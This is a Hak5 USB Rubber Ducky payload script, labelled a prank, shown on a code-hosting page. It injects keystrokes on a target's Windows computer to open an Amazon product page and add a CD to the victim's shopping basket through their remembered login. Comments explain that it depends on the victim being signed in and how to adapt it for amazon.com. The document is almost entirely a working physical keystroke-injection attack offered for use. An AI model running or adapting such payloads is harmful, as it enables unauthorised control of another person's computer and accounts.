Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/prank/Physical_Rick_Roll/payload.txt
2968 views
1
REM Title: Physical_Rick_Roll
2
REM Author: the-jcksn
3
REM Description: Adds a physical copy of "The Best of Rick Astley" CD to the target's Amazon shopping basket/cart.
4
REM Target: Windows
5
REM Version: 1.0
6
REM Category: Prank
7
8
REM Requires the target to be logged onto amazon with 'remember me' enabled - most people usually are...
9
REM Currently configured for amazon.co.uk (British) - see the minor changes required below to use on amazon.com (American)
10
11
DELAY 2000
12
GUI r
13
DELAY 200
14
15
REM ########## THIS ITEM MAY GO OUT OF STOCK, IN WHICH CASE THE PAYLOAD WILL NOT WORK - CHANGE FOR ANOTHER ITEM'S URL IF NEEDED! ##########
16
17
REM ########## FOR AMERICANS - CHANGE THIS FROM '.co.uk' TO 'com' ##########
18
STRING https://www.amazon.co.uk/Best-Rick-Astley/dp/B00MWPA39Y/ref=sr_1_7?crid=1DTB70Z2TNU5F&keywords=rick+astley+cd&qid=1650786996&sprefix=rick+astley+cd%2Caps%2C71&sr=8-7
19
20
DELAY 200
21
ENTER
22
DELAY 1800
23
CTRL f
24
DELAY 400
25
26
REM ########## FOR AMERICANS - CHANGE THIS TO 'add to cart' ##########
27
STRING add to basket
28
29
ENTER
30
DELAY 200
31
ESC
32
DELAY 200
33
TAB
34
DELAY 200
35
SHIFT TAB
36
DELAY 200
37
SPACE
38
DELAY 600
39
ALT F4
40
41